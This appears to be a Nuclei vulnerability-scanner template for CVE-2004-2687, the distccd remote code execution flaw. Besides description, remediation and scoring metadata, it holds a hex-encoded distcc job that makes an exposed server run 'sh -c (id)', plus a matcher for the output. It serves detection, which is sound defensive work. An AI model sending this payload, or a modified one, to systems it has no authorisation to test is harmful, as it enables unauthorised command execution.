id: CVE-2004-2687 info: name: Distccd v1 - Remote Code Execution author: pussycat0x severity: high description: | distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks. impact: | Unauthenticated attackers can execute arbitrary commands with elevated privileges by sending malicious compilation jobs to distcc servers that lack access restrictions. remediation: | Configure distcc to restrict server port access to authorized clients only, or upgrade to a patched version that includes proper authorization checks. reference: - http://distcc.samba.org/security.html - http://lists.samba.org/archive/distcc/2004q3/002550.html - http://lists.samba.org/archive/distcc/2004q3/002562.html - https://github.com/crypticdante/distccd_rce_CVE-2004-2687 - https://github.com/gwyomarch/Lame-HTB-Writeup-FR classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C cvss-score: 9.3 cve-id: CVE-2004-2687 cwe-id: CWE-16 epss-score: 0.90467 epss-percentile: 0.99624 cpe: cpe:2.3:a:apple:xcode:1.5:*:*:*:*:*:*:* metadata: verified: true max-request: 1 tags: cve,cve2004,network,rce,distccd,vuln tcp: - inputs: - data: 444953543030303030303031 type: hex - data: 41524743303030303030303841524756303030303030303273684152475630303030303030322d634152475630303030303030637368202d6320272869642927415247563030303030303031234152475630303030303030322d634152475630303030303030366d61696e2e634152475630303030303030322d6f4152475630303030303030366d61696e2e6f444f5449303030303030303141 type: hex host: - "{{Hostname}}" port: 3632 matchers: - type: regex part: raw regex: - "uid=[0-9]+.*gid=[0-9]+.*" # digest: 490a0046304402207f9eff918dd1bd1f893fba97dc84b837954f07617ebb6284a571da3e4913685c02200f2cf42d0df9ccc94507ab4225a5f743635abfe955f6150ef5979a43722135a4:922c64590222798bb761d5b6d8e72950